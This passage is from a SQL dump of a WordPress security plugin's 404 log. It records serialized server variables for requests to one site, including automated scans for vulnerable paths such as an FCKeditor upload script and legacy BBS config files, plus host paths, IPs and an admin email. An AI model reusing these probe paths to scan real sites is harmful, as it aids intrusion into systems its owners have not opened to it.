my/bbs/utility/convert/data/config.inc.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybhsC1sJTsX3mg7G4I7wAAAAo\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybhsC1sJTsX3mg7G4I7wAAAAo\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybhsC1sJTsX3mg7G4I7wAAAAo\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybhsC1sJTsX3mg7G4I7wAAAAo\";s:19:\"REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZybhsC1sJTsX3mg7G4I7wAAAAo\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"65194\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:10:\"SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZybhsC1sJTsX3mg7G4I7wAAAAo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544519.0841\";s:12:\"REQUEST_TIME\";s:10:\"1570544519\";}}','notice','2019-10-08 14:22:00','2019-10-08 14:21:59',35073888,36885688,'https://bintara.com.my/bbs/utility/convert/data/config.inc.php',1,0,'130.6.184.242'),(27688,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:76:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"149.155.99.167\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=25f6288e5795f18255538c3a25004c38\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"149.155.99.167\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:59:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:65:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:60:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:63:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybfnURUVLSjYCXpcIykgAAANY\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybfnURUVLSjYCXpcIykgAAANY\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybfnURUVLSjYCXpcIykgAAANY\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybfnURUVLSjYCXpcIykgAAANY\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybfnURUVLSjYCXpcIykgAAANY\";s:19:\"REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZybfnURUVLSjYCXpcIykgAAANY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"63578\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:10:\"SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZybfnURUVLSjYCXpcIykgAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544510.3936\";s:12:\"REQUEST_TIME\";s:10:\"1570544510\";}}','notice','2019-10-08 14:21:52','2019-10-08 14:21:50',35064536,36880240,'https://bintara.com.my/bbs/utility/convert/data/config.inc.php',1,0,'149.155.99.167'),(27687,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/ads/admin/admin.lnc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"134.106.87.65\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=e9632123fc8d492415be80a38bc15660\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"134.106.87.65\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/ads/admin/admin.lnc.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/ads/admin/admin.lnc.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybbbDTiPzaBc@31OEy@wAAARA\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/ads/admin/admin.lnc.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/ads/admin/admin.lnc.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybbbDTiPzaBc@31OEy@wAAARA\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/ads/admin/admin.lnc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/ads/admin/admin.lnc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybbbDTiPzaBc@31OEy@wAAARA\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/ads/admin/admin.lnc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/ads/admin/admin.lnc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZybbbDTiPzaBc@31OEy@wAAARA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"60963\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/ads/admin/admin.lnc.php\";s:10:\"SCRIPT_URL\";s:24:\"/ads/admin/admin.lnc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZybbbDTiPzaBc@31OEy@wAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570544493.711\";s:12:\"REQUEST_TIME\";s:10:\"1570544493\";}}','notice','2019-10-08 14:21:36','2019-10-08 14:21:34',35059256,36861048,'https://bintara.com.my/ads/admin/admin.lnc.php',1,0,'134.106.87.65'),(27680,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570532674.8296420574188232421875\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570532674.8296420574188232421875\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570532674.8296420574188232421875\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570532674.8296420574188232421875\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"36398\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570532674.8296420574188232421875\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxtQsfRZ9CaO@EBI5ngdAAAAJg\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxtQsfRZ9CaO@EBI5ngdAAAAJg\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"36398\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxtQsfRZ9CaO@EBI5ngdAAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570533584.119\";s:12:\"REQUEST_TIME\";s:10:\"1570533584\";}}','notice','2019-10-08 11:19:49','2019-10-08 11:19:44',35071232,35324328,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570532674.8296420574188232421875',1,0,'103.6.198.69'),(27681,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:81:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:62:\"/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=e9ce7623d2a48189d1ec88adcd97ce5e\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:84:\"http://bintara.com.my//fckeditor/editor/filemanager/upload/php/upload.php?Type=Media\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:73:\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:59:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:68:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/fckeditor/editor/filemanager/upload/php/upload.php\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/fckeditor/editor/filemanager/upload/php/upload.php\";s:74:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:69:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:72:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyaH8C1sJTsX3mg7G4IswAAABQ\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/fckeditor/editor/filemanager/upload/php/upload.php\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/fckeditor/editor/filemanager/upload/php/upload.php\";s:65:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:60:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:63:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyaH8C1sJTsX3mg7G4IswAAABQ\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/fckeditor/editor/filemanager/upload/php/upload.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/fckeditor/editor/filemanager/upload/php/upload.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"